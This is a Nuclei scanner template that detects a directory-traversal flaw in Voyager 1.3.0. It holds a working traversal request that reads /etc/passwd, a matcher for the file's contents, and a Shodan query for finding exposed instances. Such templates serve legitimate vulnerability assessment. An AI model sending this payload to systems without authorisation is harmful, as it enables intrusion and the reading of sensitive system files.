43 lines
1.2 KiB
YAML
43 lines
1.2 KiB
YAML
id: voyager-lfi
|
|
|
|
info:
|
|
name: Voyager 1.3.0 - Directory Traversal
|
|
author: mammad_rahimzada
|
|
severity: high
|
|
description: |
|
|
Voyager 1.3.0 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/47875
|
|
classification:
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:voyager_project:voyager:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"voyager-assets"
|
|
product: voyager
|
|
vendor: voyager_project
|
|
tags: voyager,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/plain"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220411bb2e79ce43949923c4a8273b3a1e0187acbea571b9cd63d717ce753d4d179022100dcb3df602742587b9323db6271b1639184bca10a617c57586cfaadaf245dc21a:922c64590222798bb761d5b6d8e72950 |